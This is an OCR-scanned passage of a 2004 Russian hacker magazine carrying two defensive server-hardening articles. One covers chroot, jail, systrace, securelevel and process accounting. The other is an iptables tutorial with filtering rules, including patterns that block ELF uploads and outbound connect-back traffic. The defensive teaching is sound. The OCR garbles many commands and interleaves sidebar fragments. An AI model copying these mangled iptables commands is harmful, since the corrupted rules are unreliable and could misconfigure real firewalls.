ство одновременных сессий, исполь- 
зовать возможности tcp-wrappers и 
т.п. В таком cnyyae inetd/xinetd высту- 
пают в качестве посредника между 
клиентом и сервером, реализуя вы- 
шеописанные возможности. При всем 
удобстве "суперсерверов" их идея не 
кажется мне замечательной. Во-пер- 
вых, если "положить" inetd DoS-ata- 
кой или эксплоитом, то упадут и все 
обслуживаемые им демоны. Во-вто- 
рых, большинство используемых для 
работе в агрессивном интернете сер- 
висов умеют самостоятельно отраба- 
тывать почти все, что предлагает 
inetd. "Суперсервер" - это сложная 
система, так что лучше не использо- 
вать ее там, где без нее можно обой- 
тись. Гуру безопасного программиро- 
вания Дэн Бернстейн предлагает 
свой вариант под названием tcpserv- 
ег (ucsp-tcp), частично выполняющий 
функции inetd. Если есть необходи- 
мость запустить программу, требую- 
щую inetd, можно воспользоваться 
tcpserver, который частично избавля- 
ет от неудобств inetd. 

Каким бы безопасным ни был демон, 
существуют механизмы, позволяю- 
щие администраторам еще крепче 
спать по ночам. Процесс, взаимодей- 
ствующий с пользователем, должен 
исполняться от имени непривилегиро- 
ванного пользователя. И правда, се- 
годня найти apache или named, запу- 
щенный от рута, довольно сложно ;-). 
Помимо этого каждый демон можно 
изолировать в его собственной среде. 
Образно, все необходимые для рабо- 
ты демона файлы и библиотеки копи- 
руются в измененный корневой ката- 
лог, и затем в получившуюся иерар- 
хию выполняется системный вызов 
chroot(2). С точки зрения демона, он 


Process accounting в действии 


ХАКЕРСПЕЦ | 10(47) | 2004 


СЛЕДИ ЗА ПАРОЛЯМИ 


Ш Если заглянуть в /etc/shadow (/etc/master.passwd в BSD), то 
можно увидеть массу системных учетных записей, но все они 
залочены - в поле пароля вместо хэша у них символ "*" или "I!" а 
вместо шелла - что-то вроде /sbin/nologin или /bin/false. Если у 
системного пользователя (не реального юзера) ты увидишь 
прописанный реальный шелл и хэш пароля, бей тревогу. 


Каким бы безопасным ни был демон, 
существуют механизмы, позволяющие 


администраторам еще крепче спать по ночам. 


работает в нормальной среде, ведь 
все необходимые для него сдрайлы 
присутствуют, зато взломщик, полу- 
чив контроль над дырявым сервисом, 
будет не в состоянии даже получить 
shell, так как /bin/sh может просто от- 
сутствовать в сИгоо-директории. Во 
FreeBSD эту идею развили, и присут- 
ствующий там системный вызов и ути- 
лита jail(8) совместно с удобным уп- 
равлением через эузсН-переменные 
позволяют удобно засадить демона 
"за решетку", из благих побуждений. 

Еще одно веяние эпохи параноиков 
- отслеживание системных вызовов, 
совершаемых программой, и дальней- 
шее их ограничение. Любое действие 
программы (такое, как чтение файла 
или открытие сетевого сокета) - это 
системный вызов ядру ОС. Значит, 
можно ограничить набор легитимных 
вызовов для каждой программы. 
Действительно, зачем DNS-cepBepy 
биндить какой-либо локальный порт, 
кроме 53-го, для приема входящих 
запросов? Механизм systrace 
(www.citi.umich.edu/u/provos/systrace), прису- 
тствующий в стандартной поставке 
OpenBSD и NetBSD, а также портиро- 
ванный на остальные платорормы, за- 
нимается тем, что отслеживает сис- 
темные вызовы программ и сопостав- 
ляет их с указанной политикой. Лю- 
бые аномалии протоколируются, и со- 
ответствующий системный вызов зап- 
рещается. В идеале это означает, что 
shell-kKogy можно помахать платочком. 

Наконец, не только бесполезные 
сервисы следует убирать из системы. 
Зачем, например, на настроенной и 
работающей машине компилятор или 
дизассемблер? Чтобы взломщику бы- 
ло легче скомпилить и применить 
сплоит? Многие дистрибутивы Linux 
практикуют исключительно binary 
upgrade, так что компилятор там мо- 
жет вообще не понадобиться. 


ЯДРО. БЕЗ ПАНИКИ 

и Обезопасив свои сервисы, обра- 
тим взор к ядру. Так как обыкновен- 
ная подмена системных утилит в два 
счета детектится системой контроля 
целостности, то без вариаций на тему 


модульного руткита не обходится ни 
один серьезный хакер. Не так уж это 
и страшно. Самое простое - собрать 
ядро без поддержки модулей. Для 
FreeBSD существует патч, позволяю- 
щий собрать ядро с опцией NO_KLD 
(people.freebsd.org/~cjc - не самый, 
правда, свежий). В Linux достаточно 
просто не указывать соответствую- 
щую опцию CONFIG_MODULES=n. К 
несчастью, многие производители же- 
леза предоставляют драйвера для 
своей продукции в виде подгружае- 
мых модулей, исключительно в бинар- 
ном виде. В BSD эту, а заодно и мно- 
гие другие проблемы, снимает kernel 
securelevel(8). В многопользовательс- 
ком режиме он может принимать зна- 
чения -1, 1,2 иЗ. 


-1 - не накладывает никаких ограни- 
чений ("небезопасный режим"). По 
умолчанию система запускается с та- 
ким значением; 

1 - "безопасный режим", запрещает 
снятие флагов immutable и append- 
only даже root'y, запрещает писать в 
память ядра или совершать привиле- 
гированные операции ввода/вывода 
на уровне ядра (/dev/mem, 
/dev/kmem, /dev/io), запрещает заг- 
рузку/выгрузку модулей ядра; 

2 - "очень безопасный режим", нас- 
negyeT все возможности предыдуще- 
го режима, а также не позволяет ни- 
чего писать на примонтированные 
файловые системы; 

3 (присутствует во FreeBSD) - "сете- 
вой безопасный режим", наследует 
возможности безопасного, а также не 
позволяет менять конфигурацию пра- 
вил пакетного сфильтра (удалять или 
добавлять правила). 

Значение Securelevel выставляется 
утилитой sysctl (переменная 
kern.securelevel) после запуска систе- 
мы и загрузки всех модулей и демо- 
нов и во время работы системы может 
быть только увеличено. Практически 
всегда сервер без графической систе- 
мы X-Window или прочей экзотики 
обязан без проблем работать со зна- 
чением kern.securelvel=1; если же он 
по совместительству является Cpaep- 


BONOM с постоянным набором правил 
фильтрации, то со значением 
kern.securelvel=3. Очень многие пре- 
небрегают это полезной возмож- 
ностью, а ведь в таком случае, чтобы 
загрузить вредоносный модуль или 
добавить свое правило в цепочку па- 
кетного фильтра, взломщику придет- 
ся перезагрузить машину, что не мо- 
жет остаться незамеченным. 

Помнится, один известный в опре- 
деленных кругах хакер временно за- 
лочил мне аккаунт на его FreeBSD- 
боксе, мотивировав это тем, что "там 
сейчас крутится много важных про- 
цессов", видимо, опасаясь команды 
"ps -а" с моей стороны. Однако если 
бы он знал о существовании sysctl- 
переменной kern.ps_showallprocs 
(security.bsd.see_other_uids gna 
FreeBSD 5), то, возможно, не стал бы 
принимать столь крайние меры. Выс- 
тавление этой переменной в 0 позво- 
лит пользователям любоваться спис- 
ком исключительно своих процессов, 
скрывая чужие. Это незаменимо на 
хостингах, где много пользователей 
имеют Shell-akkayHT. 

Часто хакеры запускают на взло- 
манной машине сниффер, особенно 
если эта машина - пограничный 
маршрутизатор, через который про- 
ходит весь традрик. В Linux для этого 
необходима библиотека libpcap, а 
вот в BSD пакеты ловятся через 
псевдоустройство bpf(4) (berkeley 
packet filter), вкомпилированное в 
ядро или загруженное как модуль. 
Часто отсутствие bpf(4) в системе (в 
любом виде) может быть оправдано 
с точки зрения безопасности. Без 
него снисфинг пакетов в BSD невоз- 
можен. Но, правда, невозможна и, 
например, корректная работа пакет- 
ного фильтра OpenBSD PF, так что 
всегда есть исключения. 

Еще одна вещь, которая может по- 
мочь при расследовании инцидентов, 
да и вообще полезна в качестве конт- 
роля за системой, это аккаунтинг про- 
цессов (во FreeBSD включается уста- 
новкой переменной 
accounting_enable="YES" в 
/etc/rc.conf, в Linux - 
CONFIG_BSD_PROCESS_ACCT=y B KOH- 
qoure ядра). Будучи включенным, OH 
протоколирует в /var/account/acct (в 
Linux - /var/log/pacct) запуск всех 
процессов, позволяя посмотреть, ког- 
да, что и от имени какой учетной за- 
писи было запущено (lastcomm(1)), a 


также позволяет выдать статистику 
по выполненным процессам (за(8)). 


АУДИТ СИСТЕМЫ 

m Хорошая система должна требо- 
вать минимум внимания. В идеале, 
около трех секунд в день - ровно 
столько нужно времени, чтобы пробе- 
жать глазами ежедневный отчет и 
убедиться в отсутствии аномалий. В 
отчет должны включаться как мини- 
мум мониторинг создания новых учет- 
ных записей (если взломщик имел не- 
осторожность добавить пользователя 
или сменить пароль существующему, 
ты это заметишь), появление новых 
суидных программ, количество забло- 
кированных фаерволом пакетов и ко- 
личество попыток неудачного входа в 
систему. Все эти меры призваны обна- 
ружить атаки на ранней их стадии. В 
BSD подобный отчет генерируется по 
умолчанию, утилитой periodic(8). По 
сути, она выполняет последователь- 
ность скриптов, запускаясь по распи- 
санию из crontab(1), результат работы 
сваливается администратору в почту. 
В /etc/periodic.conf можно определить 
указанные в /etc/defaults/periodic.conf 
опции составления отчета - помимо 
репорта репо с(8) может выполнять 
скрипты очистки /tmp, бэкапа важных 
файлов и т.п. 

Помимо самой системы уязвимости 
находят и в CocpTe, инсталлируемом 
из пакетов/портов. Полезно, конечно, 
читать адвайзори от вендоров, но на- 
иболее удобный способ - положиться 
на автоматизированный аудит безо- 
пасности. Tak, BO FreeBSD имеется 
утилита portaudit (/usr/ports/securi- 
ty/portaudit). Она скачивает базу уяз- 
вимостей и анализирует установлен- 
ные пакеты на предмет присутствия 
их в текущем списке проблемных 
программ. 

Пропиши скачивание свежей базы в 
crontab(5) (корректнее: установи 
daily_status_security_portaudit_enable= 
"YES" в /etc/periodic.conf) и любуйся 
ежедневными отчетами. 


НЕТРАДИЦИОННЫЕ МЕТОДЫ 

m Если ты заметил, BSD больше под- 
ходит для организации защищенной 
системы в рамках классической моде- 
ли безопасности UNIX. Tomy способ- 
ствуют как защитные механизмы сис- 
темы (kernel securelevel, jail, systrace), 
так и средства аудита (accounting, 
periodic), доступные, что называется, 


"из коробки". Но можно пойти дальше 
и радикально поменять саму модель 
защиты, вместо традиционной дискре- 
ционной модели доступа применив 
одну из мандатных моделей. Это уже 
серьезно и требует хотя бы поверхно- 
стного знакомства с моделями безо- 
пасности. И здесь выигрывает Linux, 
для которого существуют такие про- 
екты, как RSBAC (www.rsbac.org) и 
SELinux (www.nsa.gov/selinux), Они делают 
из Linux мощную систему с поддерж- 
кой Кое Based Access Control (RBAC), 
Domain Type Enforcement (DTE) и кучей 
другого. Bo FreeBSD 5, правда, тоже по- 
явилась возможность контроля досту- 
па по расширенным атрибутам файлов 
(Mandatory Access Control), но это кап- 
ля в море. Мандатные модели доступа - 
отдельная, серьезная тема, сложная в 
реализации применительно к конкрет- 
ному production серверу и требующая 
внимательной эксплуатации. 


Хардлинки 
Напоследок процитирую известную работают 
= i OJIbKO в 
фразу: "If you fuck up OpenBSD it gets apegenax 
unsecure. Linux must be fucked up to одной фай- 
be secure. Windows must be secure ache нЕ 
erased to be secure" ("Если ты будешь Rap Pin? 


трахать OpenBSD, она станет небезо- 
пасной. С Линуксом нужно потрахать- 
ся, чтобы он стал безопасным. А 
Windows нужно удалить, что бы она 
стала безопасным."). Доля правды в 
ней есть, но помни, что главное для 
безопасности системы - не операци- 
онка, а тот, кто ей управляет. 
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ВЫЖМИ BCE 
ИЗ ®AEPBODSIA! . 


ВЫЖМИ ВСЕ ИЗ а 


РАЕРВОЛА!) 


ОСНОВНЫЕ И ДОПОЛНИТЕЛЬНЫЕ ВОЗМОЖНОСТИ IPTABLES 


аервол - неотъемлемая часть *тх-системы. Ho, как любой программный продукт, он нуждается в тщательной 
настройке. Сейчас я расскажу о TOM, как грамотно защитить свой сервер с помощью сетевого экрана iptables. 
Этот фаервол является самым простым и надежным, поэтому рекомендую ознакомиться с этим материалом. 


рамотный админ никог- 


да не забудет устано- 


вить фаервол на свою 


Сохранить 
или восста- 
новить пра- 
вила помо- 
гут бинар- 
ники 
/sbin/ipta- 
bles-save и 
/sbin/ipta- 
bles-restore. 


Поброди no 
каталогам 
РОМ и озна- 


комься с 
документа- 
цией по 
каждому 
модулю. 
Правда, све- 
дений там 
не очень 
много. 


машину. Ведь брандма- 
уэр позволяет решать 
множество важных задач. В первую 
очередь, он «заботится» о сетевой бе- 
зопасности, сфильтруя хакерские па- 
кеты. При желании можно замутить и 
локальную безопасность, запретив 
юзерам выкачивать порнофильмы и 
варезные программы. Также с по- 
мощью сетевого экрана реально под- 
нять МАТ (Network Address 
Translation), позволяющий локальным 
машинам полноценно юзать ресурсы 
интернета. 


ЗАКРОЕМСЯ 
ОТ ВНЕШНИХ ВРАГОВ 

м Если ты работал с iptables, то 
знаешь принцип действия этого фа- 
ервола. Он содержит несколько таб- 
лиц, в каждой из которых могут на- 
ходиться так называемые цепочки. 
Дефолтовая таблица filter содержит 
три цепи - INPUT, OUTPUT и FOR- 
WARD. Первая отвечает за входя- 
щие пакеты, вторая - за исходящие. 
Последняя служит для управления 
обменом данных между соседними 
узлами. Наиболее популярный ме- 
тод настройки iptables заключается 
в добавлении разрешающих правил 
в цепь INPUT с последующим изме- 
нением ее политики. У каждой це- 
почки есть своя политика: АССЕРТ, 
REJECT и DROP. По умолчанию все 
пакеты проходят без ограничений. 
Но стоит лишь изменить политику 
на REJECT (запрещение соединения 
с взведением срлага RST в ответном 
пакете) или ОКОР (простое игнори- 
рование пакета), как данные будут 
нещадно отфильтровываться. Есте- 
ственно, что администратор заранее 
пропишет правила, по которым нуж- 
ные пакеты будут без проблем про- 
ходить на сервер. 

Давай проведем подобную наст- 
ройку фаервола. В первую очередь, 
позаботимся, чтобы пакеты беспре- 
пятственно проходили через петле- 
вой интерфейс (нам незачем запре- 
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щать локальные соединения). Вы- 
полним несложную команду: 


iptables -A INPUT -i lo -j ACCEPT. 


Как видно, команда iptables понима- 
ет различные параметры. Первый из 
них передает цепь, в которую будут 
занесены данные. Второй указывает 
на интерсрейс. Последний определяет 
политику правила. Дословно команда 
означает следующее: «анести в цепь 
INPUT правило, разрешающее прием 
пакетов с интерфейса lo. Просто? 
Еще бы :). 

Дальше чуть сложнее. Любой па- 
кет может иметь 4 различных состо- 
яния. МЕМ/ представляет собой обыч- 
ный пакет, инициирующий новое со- 
единение. ESTABLISHED - пакет от 
уже установленного соединения. 
RELATED - новый пакет данных, KO- 
торый был создан старым соединени- 
ем. И, наконец, INVALID - неизвест- 
ный пакет. Тебе необходимо разре- 
шить только два вида - RELATED и 
ESTABLISHED, потому как они явля- 
ются доверенными. Без дополни- 
тельных средств iptables не умеет 
различать состояния. В этом ему по- 
могает специальный модуль state. 


iptables -A INPUT -p tcp -m state --state 
RELATED,ESTABLISHED -j ACCEPT. 


Правило усложнилось тремя новы- 
ми опциями. Параметр -р показывает, 
что рулес применяется к ТСР-протоко- 
ny (без этого флажка нельзя заюзать 
модуль State). Опция -т позволяет 
подключать дополнительные модули. 
Третий параметр state относится к Og- 
ноименному модулю. Он показывает, 
что правило обрабатывает пакеты оп- 
ределенного вида. 

Следующий шаг направлен на 
настройку соединения с сервисами. 
Допустим, на сервере установлен 
proftpd, postfix и popa3d. На самом 
деле, сервисов может быть и боль- 
ше, суть в том, чтобы не забыть о 
каждом из них. Итак, предположим, 
что postfix должен принимать дан- 
ные от узла 192.168.1.1. К proftpd 
имеют право подключаться только 
клиенты сегмента 192.168.0.0/24, а 
снимать почту могут все. Давай 
оформим такую политику в виде 
трех несложных правил. Для удоб- 
ства рекомендую создать дополни- 
тельную цепь Services и подключить 
ее к основной INPUT. 


iptables -N services 

iptables -A INPUT -j services 

iptables -A services -p tcp --dport 25 -s 
192.168.1.1 -| ACCEPT 

iptables -A services -p tcp --dport 21 -s 
192.168.0.0/24 -j ACCEPT 


1108 to ЦОР ai=— * 
fieie ВТ, ЕТ ISAs 
A082 L453 LOCEFT #11 — № 


В PT ail aie 
Г ip — F 
ET] нев -- в 
top apt 1100 
1174 @i4 CCRT tcp == № 


re he MET 
tep det ri 
fs 1031 eer ai — Ff 


true ed ipeejee -eek TOT 
cin DPST Ce hiet Pe 27104 peta, 
piece БЕ pepe pit ope in 


mart nazis 


ton phen 
owt met Lom 


0.6, 8,078 6.8,0,8/0 


О. ПРО 60.6 0/0 


0.0. 0.0/0 0.00.00 
he, a, 1 й. 0.0 0/8 
2. FS. 14d. ББ 60.5 .6'0 


ВТ. БТ, Ц, 9 0.0.0, 020 


Ph. 8-20. ШТ 0.0.0070 


iptables -A services -p tcp --dport 110 -} 
ACCEPT 


Флаг -s отвечает за |P-agpec отпра- 
вителя. Он может принимать значе- 
ние как отдельной станции, так и це- 
лого сегмента. Теперь, когда цепь 
INPUT полностью настроена, можно 
менять ее политику и тестировать 
созданные правила. Последний штрих 
достигается следующей командой: 


iptables -P INPUT DROP 


Можно сказать, что теперь твой 
сервер защищен от посторонних 
глаз. Однако существует много спо- 
собов обхода фаерволов, один из 
которых заключается в написании 
соппраскК-сценария. Последний сам 
соединяется с хакерской машиной. 
Чтобы пресечь подобные действия, 
необходимо срильтровать исходя- 
щий трафик. Менять политику цепи 
не стоит, нужно просто добавить нес- 
колько ограничивающих правил с 
участием модуля owner. 


ФАЕРВОЛ ПОКАЖЕТ, 
KTO ХОЗЯИН! 

и Библиотека owner.so является 
весьма полезной. Она создана для 
того, чтобы запретить локальному 
пользователю обращаться к ресур- 
сам сети. Часто хакеры совершают 
свои злодеяния с веба, и стандарт- 
ная настройка брандмауэра не спа- 
сает. В случае если ты подвяжешь 
модуль ом/пег, можно сделать так, 
чтобы процесс httpd не мог откры- 
вать порты, а тем более коннектить- 
ся на чужие машины. Это достигает- 
ся всего двумя командами: 


iptables -А OUTPUT -m owner --uid-owner 
99 -p tcp --dport 80 -j ACCEPT 

iptables -A OUTPUT -m owner --uid-owner 
99 -j DROP 


Модуль позволяет анализировать 
UID локального пользователя. Если 
он равен 99 (что соответствует логи- 
ну nobody), правило запретит обраще- 


ЛИКБЕЗ ПО IPTABLES 


ние к неизвестным портам. Второе 
правило запрещает любые действия 
nog nobody. Оно должно располагать- 
ся ниже первого, потому что iptables 
анализирует рулесы по принципу от 
частного к общему. 

Существует еще одна проблема, с 
которой ты можешь столкнуться. В 
случае если на твоем сервере пропи- 
саны другие пользователи и ты не 
хочешь, чтобы они прокачивали че- 
рез машину фильмы и музыку, при- 
дется добавить несколько правил, 
которые аналогичны предыдущему. 
Пришло время урезать сетевые пра- 
ва пользователя по самые уши :). Не- 
обходимо помнить, что юзеру надо 
разрешить пропуск RELATED- и 
ESTABLISHED-nakeToB, в противном 
случае он не сможет заливать дай- 
лы на локальный FTP. 


iptables -А OUTPUT -р tcp -m state --state 
| RELATED,ESTABLISHED -m owner --uid- 
owner 31337 -} DROP. 


Этот рулес позволит фильтровать 
все пакеты, посланные юзером 31337. 
Помимо uid ты можешь ограничивать 
И gid, а также мутить доступ к произ- 
вольной сетевой команде. Если ты за- 
интересовался этим модулем, можешь 
ознакомиться со всеми его парамет- 
рами, набрав команду iptables --help 
-m owner. 


МОДИФИКАЦИЯ ПАКЕТОВ 

m Настало время поговорить о вто- 
рой таблице iptables, которая называ- 
ется па{. Эта чудесная таблица содер- 
жит три цепочки: PREROUTING, OUT- 
PUT и POSTROUTING. Правила, распо- 
ложенные в этих цепях, нужны для 
корректировки пакета. Например, ты 
хочешь, чтобы машина с !Р-адресом 
192.168.0.2 выходила в интернет нап- 
рямую. Для этого достаточно вос- 
пользоваться маскарадингом, доба- 
вив всего одно правило в таблицу 
POSTROUTING. 


iptables -t nat -A POSTROUTING -s 
192.68.0.2 -j MASQUERADE 


mM Вот несколько команд, которые ты можешь использовать при 
работе с iptables. 


iptables -N цепь - создание новой цепочки 


iptables -F цепь - очистка произвольной цепи 


iptables -Х цепь - удаление цепи 


iptables -D цепь номер_правила - удалить правило из определенной цепи 

iptables -Р цепь политика - изменение политики цепи 

iptables --line-numbers -пуЁ цепь - просмотр всех правил в определенной цепи в 
\уегрозе-режиме, без преобразования адресов с нумерацией каждого правила 


(быстрый и подробный просмотр) 


service iptables save/restore - сохранение (восстановление) всех правил в 


отдельный конфиг 


service iptables start/stop - запуск (останов) фаервола 


Суть маскарадинга заключается в 
замене локального IP на адрес шлю- 
за. Получается, что конечный узел 
фактически соединится не с локаль- 
ной машиной, а с маршрутизатором. 
Последний будет форвардить все 
пришедшие пакеты узлу с адресом 
192.168.0.2. 

Вообще, использовать МАТ в круп- 
ной сети не рекомендуется. Если ка- 
кой-нибудь юзер стянет пару гигов с 
порносайта, администратор не опре- 
делит виновника. Поэтому вместо 
МАТ используется прокси-сервер. 
При переходе на прокси возникает 
одна проблема: админа ломает бе- 
гать по всем машинам и прописы- 
вать адрес проксика в настройки 
браузера. К счастью, не все так пло- 
хо: можно просто оформить реди- 
рект портов, а затем немного настро- 
ить конфиг squid. В этом случае кли- 
ент соединится с прокси-сервером, 
сам того не желая :). Для выполне- 
ния редиректа вписывай легкое пра- 
вило в цепь PREROUTING. 


iptables -t nat -A PREROUTING -s Помимо 
192.168.0.0/24 -p tcp --dport 80 -j REDIRECT лаве 
патчей, 
-to-port 3138 POM cogep- 
жит фиксы 
Рассмотрим ситуацию сложнее. В cree НЕ 
твоей локалке есть сервер, не имею- abe 
> e rop, 
щий внешнего адреса. А управлять ва 
им хочется из дома. С помощью ipta- guake3 :). 
bles ты легко можешь намутить MO- 
дификацию не только портов, но и 
IP-agpecos. В результате небольшой 
подмены шлюз соединит твой go- 
машний комп с локальным серве- Чтобы уз- 
ром. Вот правило, которое прописа- WEA LELC 
параметры 
но на моем фаерволе. Оно связыва- понимает 
ет мой компьютер и терминальный тот или 
~ WHOM мо- 
сервер в локальной сети. дуль, вы- 
полни aa 
j 2 = = ман а- 
iptables -t nat -А PREROUTING -s Bins nel 
194.225.226.3 -p tcp --dport 3389 -j DNAT -- -т имя_мо- 
to-destination 10.50.40.255:3389 Уля. 
Таким образом, если пакет направ- 
лен на порт 3389, шлюз заменит в 
нем адрес назначения на 10.50.40.225 
и перенаправит данные на локальный 
сервер. С помощью этого механизма я » 
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НЕПРИСТУПНЫЙ 


ЗАЩИТА 


ВЫЖМИ ВСЕ ИЗ ФАЕРВОЛА!) 


без проблем могу рулить терминал- 
кой из дома. Чего и тебе желаю :). 


ХОЧЕШЬ БОЛЬШЕГО? 
СТАВЬ ПАТЧИ! 

Несмотря на столь широкие воз- 
можности iptables не превосходит 
ОрепВ$В"шный pf по дункциональ- 
ности. Его конкурент умеет различать 
операционные системы по хитрому 
fingerprinting'y, защищать сервер от 
скана портов и т.д. Пришло время на- 
нести ответный удар. Итак, встречаем 
новый патч для iptables nog названи- 
ем Patch-o-Matic. Набор РОМ создан 
для админов, которым мало стандарт- 
ных возможностей сфаервола. OH 
включает в себя набор модулей, поз- 
воляющих творить невероятные ве- 
щи. Правда, чтобы пропатчить бранд- 
мауэр, придется пройти через семь 
кругов ада. Сперва убедись, что твое 
ядро собрано из исходников. Сорцы 
ядра понадобятся инсталлятору РОМ, 
ведь все таблицы и цепочки создают- 
ся именно в кернеле. Если твоя систе- 
ма построена на РРМ-пакетах, тебе 
придется перекомпилить ядрышко, 
предварительно стянув его с ftp.ker- 
nel.org (либо с диска). Не забудь 
включить в ядро поддержку ipfiltering 
и прочих сетевых вещей. После того 
как отмучаешься с кернелом, скачи- 
вай свежий iptables 
( ), а 
также прилагающийся к нему патч 
( 


Я не прове- ). Теперь распаковывай 
А фаервол и компилируй его. Когда ты 
ром 2.6.x. сделаешь все эти шаги, наступит вре- 
Разработчи- = мя для установки патча. 

ки о сов- 

COS RAE Внутри архива с РОМ содержится 
также перловый инсталлятор. Для его кор- 
WEEE EL EEP ректной работы тебе понадобится 

ют. Поэто- 

му я не га- библиотека termcap, поэтому убедись 
soap eg в наличии файла /etc/termcap. Запус- 
ность рабо- ти инсталлятор с параметром base. В 
ты с подоб- интерактивном режиме выбери нуж- 
erated ный патч из этой категории (прове- 


ренные базовые обновления). К каж- 
дому сфиксу приводится развернутое 
описание с конкретным правилом. 
После базовой установки можно за- 


Помимо инсталлить дополнительные патчи, 
ОМАТ су- запустив инсталлер с опцией extra. 
ществует и 

SNAT, когда Процесс установки очень прост, ты с 
заменяется ним разберешься без дополнитель- 
адрес отп- 7 

а ной помощи. Сложности возникнут 
Это бывает после инсталляции. 

необходи- Итак, все фиксы установлены, и ты 
мым в неко- 

торых слу- жаждешь применить их на практике. 
чаях. Перед тем как это сделать, тебе при- 


дется выполнить два финальных ша- 


netfilter 
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МНЕНИЕ ЭКСПЕРТА 


га. Во-первых, зайди в каталог с ис- 
ходниками ядра и запусти make menu- 
config. Затем переходи в раздел ipfil- 
tering и выбирай все патчи, которые 
были установлены скриптом гипте. 
Сохрани все изменения и открой .соп- 
fig для редактирования. Если ты уста- 
новил обновления TARPIT и OSF, убе- 
дись в наличии двух установочных 
директив и в случае их отсутствия 
внеси их самостоятельно. 


Во-вторых, заново перекомпили- 
руй iptables и набери make install, 
чтобы все модули были скопирова- 
ны в каталог /lib/iptables. Если все 
произошло без осложнений, мож- 
но сказать, что РОМ успешно уста- 
новлен. 
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ПРАКТИКУЕМСЯ? 

Настало время для легкой 
практики после тяжелой уста- 
новки. Рассмотрим модули из 
коллекции РОМ, которые 
действительно облегчат твою 
жизнь. Первая библиотека, 
которая мне очень понрави- 
лась, называется time.so. Она 
поможет активировать прави- 
ло в определенное время. Это 
очень удобно, с помощью нее 
ты можешь либо открывать 
ночной интернет, либо ограни- 
чивать доступ к некоторым 
популярным ресурсам в час 
пик. Тебе достаточно доба- 
вить одно-единственное пра- 
вило в цепь INPUT. 


Тщательно конфигурируем ядро! 


Данный рулес запрещает об- 
ращаться к вебу в дневное 
время. Как я уже сказал, ты 
можешь юзать time.so в каче- 
стве ограничителя интернета. 
Для этого добавь правило в 
цепь POSTROUTING таблицы 
nat. Следующий модуль назы- 
вается random.so. Он позволя- 
ет регулировать вероятность 
правила. В некоторых ситуаци- 
ях библиотека просто незаме- 
нима. К тому же, ты можешь 
раскрутить своего шебра на 
апгрейд, показав ему великую 
нагрузку на сервер. Предвари- 
тельно ты, конечно же, пропи- 
шешь хитрое правило, которое 
выставляет вероятность 33% 
на соединение с Web-cepBe- 
ром. 


Но эти модули сделают рабо- 
ту удобной лишь в конкретных 
ситуациях. В повседневной 
практике ты можешь приме- 
нять другие библиотеки. Нап- 
ример, mport.so и iprange.so. 

Эти дополнения - великая си- 
ла, ибо они позволяют гибко 
формировать целый диапазон » 
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Выбери сам: 
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ВЗЛОМ ПО-ЯПОНСКИ 
Нашумевшие истории 
крупных взломов. 


КАК ЛОМАЛИ 
ГЛЮКОЗУ.РУ 
Криворуким 
отечественным 
админам посвящается. 


ХРОНИКИ ЦЭЦЭ 
Репортаж с крупнейшей 
демопати России. 


На наших дисках ты 
всегда найдешь 
тонну самого 
свежего соф- 
та, демки, му- 
зыку, а также: 
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Вероятное срабатывание события 


портов и |Р-адресов в одном правиле! 
Не веришь? Просто набери в консоли 
команду: 


iptables -A INPUT -p tcp -m трой --dports 
21,22,25,110,4000:5000 -j ACCEPT 


и действие хитрого правила сразу 
вступит в силу. Теперь тебе не надо 
расписывать два десятка рулесов для 
каждого сервера. То же самое можно 
сказать и про |Р-адреса. Разрешить 
соединения целому диапазону айпиш- 
ников можно также одним правилом: 


iptables -A INPUT -р tcp -m iprange --src- 
range 192.168.0.1-192.168.0.100 -j ACCEPT. 


ет модуль string.so. Например, ты захо- 
чешь намутить защиту от пересылки 
зне!-кодов на твою машину либо прос- 
то не желаешь, чтобы юзер заливал 
бинарник на сервер. Если раньше при- 
ходилось патчить кернел и ставить 90- 
полнительный модуль, то сейчас дос- 
таточно вбить всего одно правило: 


iptables -A INPUT -р tcp --dport 21 -т 
string --string '|7F|ELF' -j DROP 


Раз уж мы заговорили об ограниче- 
ниях, расскажу, как предостеречь 
свою машину от Во5-атаки. Нужно 
воспользоваться модулем limit.so, 
позволяющим ограничивать пропуск- 
ную способность. Если ты видишь, 
что твой FTPD зажирает процессор и 
захлебывается в данных, сделай огра- 
ничение в 5 пакетов за одну секунду. 


iptables -A INPUT -p tcp --dport 21 -m limit 
--limit 5/sec -j REJECT 


Вероятно, у тебя 
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Пустой порт - ловушка для хакера 


СОЕДИНЕНИЕ C ПУСТОТОЙ 

m Иногда нужно имитировать Coegu- 
нение. Для этого админом пишется 
специальная программа, прослушива- 
ющая определенный порт. Теперь 
можно добиться результата с по- 
мощью модуля tarpit.so. Он нужен для 
открытия пустого порта. Причем порт 
будет светиться в выводе netstat'a 
после фактического соединения. Эта 
библиотека может быть полезна, если 
админ решается написать фаерволь- 
ную утилиту против скана определен- 
ных портов, с последующим занесе- 
нием в лог всех попыток соединения. 
Не буду тебя мучить, просто напишу 
правило. 


iptables -A INPUT -р tcp --dport 31337 -j 
TARPIT 


ФИЛЬТРУЙ БАЗАР 
m= Теперь iptables умеет искать 
подстроку в пакете. В этом ему помога- 


ай ева раны Г.В, ОНТ es oe Ба орт 


Tok ar 


уже кружится голо- 
ва от наворотов 
РОМ. Но самое вкус- 
ное я оставил на- 
последок :). Теперь 
ты способен контро- 
лировать одновре- 
менное число подк- 
лючений не только 
с одного |Р-адреса, 
а даже с целой под- 
сети! Это возможно, 
даже если сам сер- 
вис не поддержива- 
ет такую функцию. Модуль connlim- 
it.so создан специально для подоб- 
ной работы. Библиотека способна 
ограничить подключения к опреде- 
ленному сервису, например, к демо- 
ну sshd. Просто добавь рулес в 
цепь INPUT: 


a вы 


iptables -A INPUT -р tcp --syn --dport 22 - 
т connlimit --connlimit-above 3 -j REJECT. 


И В ЗАКЛЮЧЕНИЕ... 

и Думаю, этого материала тебе 
хватит не только для освоения азов 
iptables, но и для грамотной защиты 
своего сервера. Благо брандмауэр 
это позволяет :). Синтаксис iptables 
прост как три копейки, думаю, ты 
все понял уже после первого прави- 
ла. Теперь все зависит только от те- 
бя, я же могу пожелать немного тер- 
пения и изобретательности. Осталь- 
ное прибавится после установки 
Patch-o-Matic :). 


Если твой ЕТРО зажирает 
процессор и захлебывается в данных, 
сделай ограничение 
в 5 пакетов за одну секунду. 
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Тоха (toxa@cterra.ru) 


ХИТРЫЙ ТЮНИНГ 
И ГРАМОТНАЯ 
ЗАЩИТА 


ПОЛЕЗНЫЕ ПРИЕМЫ НАСТРОЙКИ СЕРВЕРА 


T ы поставил и настроил сервер. У тебя все работает, пользователи довольны, и теперь настало время добавить в 
систему ту самую изюминку, о которую, возможно, сломает зуб не один взломщик. 


